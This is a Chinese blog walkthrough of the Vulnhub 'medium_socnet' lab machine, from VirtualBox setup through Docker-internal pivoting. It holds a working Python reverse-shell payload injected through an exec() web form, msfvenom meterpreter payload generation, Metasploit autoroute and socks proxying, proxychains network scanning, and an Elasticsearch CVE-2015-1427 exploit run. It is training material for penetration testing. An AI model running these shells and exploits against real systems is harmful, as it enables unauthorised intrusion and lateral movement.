medium_socnet内网穿透靶机(解决5000扫描不到,和虚拟机启动成功问题)

最新推荐文章于 2024-05-15 09:15:00 发布
最新推荐文章于 2024-05-15 09:15:00 发布
阅读量539 收藏 3
点赞数 4
文章标签: java 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71274136/article/details/132920024
版权

1.准备工作

靶机设置

这个靶机不兼容VM,需要使用VirtulBox,就是这个东西

以管理员身份运行该程序!!!!

前面是用老版连接的,你可以先浏览我的文章,不要安装靶机,因为最后我也是用的7.0.10版的才成功的。

中间废话比较多,因为是我自己摸索的,我比较话痨,所以请见谅~

我们导入我们下载号的靶机

自作聪明,改了一下路径,不知道行不行

点击导入

这边就有了

设置

选择跟我一样的

然后启动。。。。。

上网上搜索,去关掉这个

然后。。。。

打开终端(以管理员身份运行)

bcdedit /set hypervisorlaunchtype off

还不行~

直到第二天,他提醒我下载最新版,你下载你年份的最新版就行

Index of http://download.virtualbox.org/virtualbox/7.0.10

欧克

kali设置

打开虚拟机,设置这个

kali的设置

这样eth0->kali的网络适配器->net连接,用于上网,模拟外网

eth1->kali的网络适配器2->桥接,用于和VB(VirtulBox)上的靶机通信,模拟内网

修改网络配置文件

vim /etc/network/interfaces

写入以下内容
auto eth1
iface eth1 inet dhcp

重启网络服务
service networking restart
 

ip a进行查看,我也不知道为啥我有两个56的ip

配置完的,还是没有ip的,我也不知道,我是设置完靶机的设置之后,过一段时间就有了,用ip a看ip,ifconfig看是这样的

 arp-sacn扫描不到,我删除靶机,用最新版重新导入

对比mac可以扫描到了

欧克,终于扫描到5000了!!!

你们成功扫描到5000后就看下面这两个博主的吧,我抄他们的,主要跟着最下面的那个博主,他的比较全

 感谢这些博主

漏洞靶场实战-Vuluhub medium_socnet_vulnhub socnet_OceanSec的博客-CSDN博客

靶机: medium_socnet - sha0dow - 博客园 (cnblogs.com)

以下全是烂尾楼,不用看了

2.开始信息收集

dirsearch 着,ssh弱口令就算了,肯定不行

dirsearch -u 'http://192.168.56.103:5000'

然后找web漏洞。。(kali扫描,卡死了~)

有道翻译

没发现框架,用whatweb试试

whatweb http://192.168.56.103:5000/ -v

试试输入框,输入1

输入111111111111111111 

访问admin

输入11111111

说明可以用exec()来执行一些东西。(我以为是php里的这个exec呢)

其他博主说

而 Python 2.7.15 的 exec() 常用于存储在字符串中的代码语句执行,那么我们可以尝试查找关于 Python 2.7.15 反弹 shell 的代码,通过 exec() 进入 192.168.56.101 这台机器了

有两种监听方式

方法1:

nc -lvp 4444

方法2:

使用msfconsole监听

msfconsole

使用漏洞的监听模块

use exploit/multi/handler

set payload cmd/unix/reverse_bash

kali的ip

run执行

web网页上传提交,记得改成自己kali的,端口随便选

import socket,os,subprocess
RHOST='192.168.56.102'  # Change it
RPORT=4444  # Change it
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  # 创建一个TCP-socket对象
s.connect((RHOST,RPORT)) 	# 连接攻击者
os.dup2(s.fileno(),0)		# 复制链接符
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])  # 创建子进程调用SHELL

记得修改ip,改成kali的

这边就连接到了

ls

最高权限,但是根目录下没有flag

docker里可以搭建虚拟机,我们可能在这个虚拟机里,查看dockerfile文件

查看

ai回答,可以不看

这是一个 Dockerfile 文件的内容,用于构建和运行一个基于 Python2.7 和 Flask 框架的 Web 应用程序。

以下是Dockerfile中各个命令的解释:

  1. FROM python:2.7-alpine: 设置了基础镜像为 Python2.7 版本的 alpine 系统。这里使用alpine系统是因为它是一个小型的 Linux 发行版,具有轻量级、安全、可靠等特点。

  2. COPY . /app: 将当前目录中所有文件复制到容器中的 /app 目录下。这一步将把应用程序代码和依赖都复制到容器内部以便后续的构建和运行。

  3. WORKDIR /app: 设置工作目录为 /app,即容器内的应用程序主目录。

  4. RUN pip install -r requirements.txt: 在容器中运行 pip 命令,安装 requirements.txt 中指定的所有 Python 依赖。在这个Dockerfile中,它将安装 Flask 应用需要的所有 Python 模块。

  5. CMD ["python", "/app/main.py"]: 容器启动后执行的默认命令,在这里是通过 Python 运行 main.py 文件,启动 Flask 应用程序。

通过运行 docker build -t socnet . 命令可以创建一个名为socnet的Docker镜像,其中的.表示Dockerfile所在的目录。

而通过运行 docker run -td --rm -p 8080:8080 socnet 命令则可以在Docker中运行socnet镜像,并映射到本地主机的8080端口,以便可以通过浏览器访问该Web应用程序。

  • 查看根目录中是否存在 .dockerenv 文

  • 查看 /proc/1/cgroup 中的内容是否大量与 docker 有关

其他博主得出结论:我们在docker这个靶机中。

我理解的是(下面只是讲解)

我有一台win10,我win10上安装了虚拟机kali,我是攻击者,我现在就攻击到了kali,,也就是我们在这个docker中。flag呢,却在win10上。

再看看网络问题,kali连接着我(攻击者)和内网的win10,要想攻击win10,必须利用kali做跳板,内网穿透到win10和kali的内网里。

其他博主说

Metasploit 中的 checkcontainer 模块、(判断是否为虚拟机,checkvm 模块)该模块其实进行了这些操作

也就是说我们现在拿到的是一个 docker 容器内的用户 shell,不是真实的服务器,所以接下来就要尝试横向移动是在不行再容器逃逸

第二天做的,kali的ip变成了56.104

我又重新连接

这样快

3.第一台主机利用

不理解,为什么要再连一次

生成shell,注意端口

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.56.104 lpost=5555 -f elf -o s.elf

移动shell到apache下,并且开启apache服务,注意这个目录的权限,我是777,

systemctl restart apache2.service

注意路径!!!!!!!,转到我这个路径里来

靶机上

报这个错的,是因为你靶机该文件下已经有了,删了就行

注意下面的IP!!!是kali的

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.56.104
set lport 5555
run

靶机这边运行

没成功,换了一个博主,重新做

import os,subprocess,socket
 
# 创建套接字 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)      # socket.AF_INET代表使用IPv4协议,socket.SOCK_STREAM 代表使用面向流的Tcp协议
 
# 创建通信
s.connect(('192.168.56.103',23333))
 
# 重定向,保障通信的输入与输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
 
# 生成反弹的 shell 
p=subprocess.call(["/bin/sh","-i"])

# 使用时压缩上面的代码,以便 exec() 执行
import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.103',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

netcat -lnvp 23333

另起终端

msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.56.103 lpost=4444 -f elf -o s.elf

这边成功连接

现在我们相当于不再使用web服务里的那个漏洞连接这个东西,有啥意义?

为了添加路由

将获取的网段 172.17.0.3/16 -> 172.17.0.0/16 添加路由 run autoroute -s 172.17.0.0/16 命令,查看是否成功添加 run autoroute -p

可以看到172.17.0.3/16

exit退出

创建成功之后我们将当前的会话挂起,使用 background 是将当前 msf 会话挂起,想重新利用会话使用 sessions -i 其中 i 是会话编号

好的,我们已经完成了最重要的一般,接下来是 socks 代理

继续前面的,使用 use auxiliary/server/socks_proxy 进入代理模块

  • 设置服务版本 set VERSION 4a
  • 设置 IP set SRVHOST Kali的IP
  • 查看配置是否正确 show options
  • 收尾 exploit

run

另起终端,配置 proxychains ,配置 proxychains 的代理列表添加 socks4 [上面 set SRVHOST 的 IP 地址] [上面的 SRVPORT]

touch proxychains.conf      # 创建目录级的 proxychains 配置文件,我们不污染系统级的配置文件
sudo cat /etc/proxychains4.conf > ./proxychains.conf    # 将系统级的配置文件复刻到当前目录的配置文件 proxychains.conf
vim ./proxychains.conf      # 只需要修改最后一行 socks4 127.0.0.1 9050 改为 socks4 192.168.56.103 1080

完成整个代理步骤后可以通过 proxychains 或 proxychains4 作为其他命令前缀探索内网,但我们使用的是目录级 proxychains 配置文件实验需要使用 -f 参数指定配置文件

proxychains4 -f ./proxychains.conf nmap -Pn -sT 172.17.0.0/24   # 172.17.0.0/24 是目标容器系统的内网网段,扫描过程中可能会比较费时【段扫描数量太大】

我们使用之前 msf 的那个 shell 执行 sessions -1 回到之前的挂起的会话,使用 arp a 简单说明判断其他存活的 ip

用 proxychains 的那个 shell 执行 nmap 扫描 172.17.0.1

proxychains4 -f ./proxychains.conf nmap -p22,5000 -Pn -sT -sV 172.17.0.1

发现与我们之前的目标容器非常相似,我们可以使用 firefox 设置代理访问 http://172.17.0.1:5000 浏览器代理方法自行百度,重点使用手动配置代理配置 SOCKS 主机 与前面 proxychains.conf 一致

proxychains4 -f ./proxychains.conf nmap -Pn -sT -sV 172.17.0.2 

  • 发现新线索,172.17.0.2 的 9200 端口开启,运行服务 Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2) 说明:Elasticsearch 是位于 Elastic Stack 核心的分布式搜索和分析引擎

  • 此处我们可以使用 searchsploit 查询 Elasticsearch 相关漏洞并尝试,攻入其中

此处我们可以使用 searchsploit 查询 Elasticsearch 相关漏洞并尝试,攻入其中

尝试一个 /usr/share/exploitdb/exploits/linux/remote/36337.py 但注意是否安装 python2 以及其 requests 如果没有使用以下代码

sudo apt-get install python2    # 安装 python2
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py     # 安装 python2 的 pip2 如果有就跳过此步
python2 -m pip install requests     # 安装 requests 包
proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2  # 利用 36337.py 脚本

可以看到下面报错了,查看错误是 ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427) 想要要利用需要先查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据

使用 curl 在 Elasticsearch 添加一条数据 curl -XPOST 'http://172.17.0.2:9200/doc/test' -d '{ "name" : "lupin"}'

proxychains curl -XPOST 'http://172.17.0.2:9200/doc/test' -d '{ "name" : "lupin"}' 

proxychains python2 a.py 172.17.0.2

一大口木
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
socnet-backend
03-19
" socnet-backend "项目是一个基于JavaScript技术构建的后端网络应用程序。这个项目的核心目标是创建一个社交网络平台的后端基础设施,它负责处理用户交互、数据存储和通信等功能。JavaScript作为主要编程语言,通常...
SocNet:OOPT项目3
07-21
【标题】"SocNet:OOPT项目3" 指的是一个关于社交网络的开源项目,该项目可能是OOPT(Object-Oriented Programming Techniques)课程的第三部分实践内容。在这个项目中,开发者可能会学习和应用Java编程语言来构建...
【vulhub靶场】medium_socnet
今天是几号的博客
03-24 886
显示缺少libstdc++库,尝试能不能 apt-get install libstdc++6 一下,答案是没有权限,那么能不能从kali上把该库文件复制过来使用呢?复制过来需要放到/usr/lib/目录下,不然程序无法正常调用,然而该目录是禁止普通用户访问的。Dockerfile 是一个文本文件,其内包含了一条条的指令(Instruction),每一条指令构建一层,因此每一条指令的内容,就是描述该层应当如何构建。服务端连接成功,获取到了一个会话,进入这个会话中,开启一个 socks 代理。
渗透测试--medium_socnet
weixin_44727454的博客
06-09 896
通过对medium_socnet靶机的渗透测试,了解关于内网渗透和关于Docker逃逸的知识。通过web层面的代码执行漏洞,执行python反弹shell获取shell。发现是在docker环境中。通过Vemon建立隧道,对内网进行主机发现和端口扫描,获取敏感文件找到真实主机的ssh登录用户和密码,最后通过Linux内核提权获取该靶机的root权限。...
漏洞靶场实战-Vuluhub medium_socnet
qq_44005305的博客
05-15 808
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
medium_socnet靶场
wcl20010的博客
05-02 2725
1.主机发现 arp-scan -l nmap -p 1-65535 -A 192.168.128.140 发现的22 5000端口 通过服务级别的探测 nmap -p22,5000 -sV 192.168.128.140 2.漏洞发现 发现一个信息:说明服务使用python的脚本编写 Werkzeug httpd 0.14.1 (Python 2.7.15) 知道一个网页,发现不到信息尝试进行目录扫描,使用工具dirb或者dirsearch dirsearch -u http://
靶机系列-----medium_socnet
weixin_43993545的博客
05-17 312
靶机系列-----medium_socnet,是一个简单的靶场,可以来尝试一下
【Orasi靶机
qq_40646572的博客
09-29 1822
orasi靶机挑战
SocNetV-3.0.4-7751bace-windows-installer.zip
01-18
Social Network Visualizer (SocNetV) is a cross-platform, user-friendly free software application for social network analysis and visualization. With SocNetV you can: Draw social networks with a few ...
Group17:社交媒体应用
05-20
带有SocNet临时名称和徽标的Social Networking App 分工 David:主页Fernando:注册/登录 技术领域 我们的团队在Bootstrap和一点CSS中使用了HTML 注册说明 注册页面包含一个主要的div元素和一个表单元素。 第一个...
40个神奇国外开放源码WordPress插件设计
08-15
散装的创造者插件可以派上用场,它创建一个自定义的界面,您可以快速添加新的文章,网页,和自定义文章类型而不需要使用较慢的 WP 管理环节。 可湿性粉剂 bitbucket 插件是一个快速的方法来将项目数据并显示到您的...
Vulnhub_Phineas
weixin_63960760的博客
08-21 112
因为靶场使用Vm8网卡,所以在Vm8网段中搜索存活主机得到在此网段中存活的主机,筛选后得到靶场的IP地址为192.168.175.131。
medium_socnet
果粒程
11-21 853
vulnhub-medium_socnet靶机打靶过程
medium_socnet靶场之代码注入、内网信息收集、内网穿透、Werkzeug协议、本地提权
qq_40898302的博客
04-28 243
靶机地址:主机发现端口扫描服务发现路径爬取代码注入Shell脚本内网信息收集内网穿透漏洞利用密码破解本地提权攻击代码修改Werkzeug协议基于python语言开发的底层框架。
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1535
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
0x01-medium_socnet
rec09er的博客
04-09 5378
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 通关目标:拿下目标靶机的root权限 攻击机:kali 目标靶机medium_socnet 涉及攻击方法: ● 主机发现 ● 端口服务扫描 ● web侦查 ● 目录扫描 ● 代码注入 ● 反弹shell ● 内网信息搜集 ● 内
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6014
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
ubuntu 虚拟机设置全局代理 windows 上网环境
Armink Studio
07-09 4257
ubuntu 虚拟机设置全局代理 windows 上网环境背景准备工作STEP 1:启用 windows 上 SS 的“允许来自局域网连接”STEP 2:设置虚拟机为桥接模式STEP3: ubuntu 安装 polipoSTEP4:配置 polipoSTEP5:使用 ubuntu 代理STEP6:测试 背景 近期更新了 ubuntu 虚拟机里 ss 配置,但无奈客户端并不支持最新的 chacha2...
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5334
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
nmap扫描不到端口
最新发布
06-28
Nmap是一款网络探测工具,用于扫描网络服务、端口开放状态以及主机信息等。如果Nmap扫描结果显示某个端口没有响应,可能有以下几个原因: 1. **端口未开放或关闭**:该端口可能并未在目标主机上配置为监听服务,或者服务已经停止运行。 2. **防火墙或安全组阻止**:如果目标系统有防火墙规则,它可能会阻止Nmap的连接尝试,使得端口无法被扫描到。 3. **操作系统限制**:某些操作系统可能会对哪些应用程序可以监听哪些端口有限制,特别是对于根用户权限。 4. **目标主机未响应**:Nmap依赖于目标主机的回应,如果主机处于离线、宕机或拒绝服务攻击的状态,也可能扫描不到。 5. **扫描技术限制**:Nmap使用特定的探测技术(如TCP/UDP扫描、ping等),如果目标端口设置为仅接收特定类型的数据包,常规扫描可能无法识别。 6. **网络拓扑问题**:如果Nmap的源和目标之间存在网络分区,可能导致扫描无法到达。 相关问题: 1. Nmap如何确定端口是否开放? 2. 如何解决Nmap扫描被防火墙阻止的问题? 3. 除了端口扫描,Nmap还有哪些功能可以帮助诊断网络状况?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值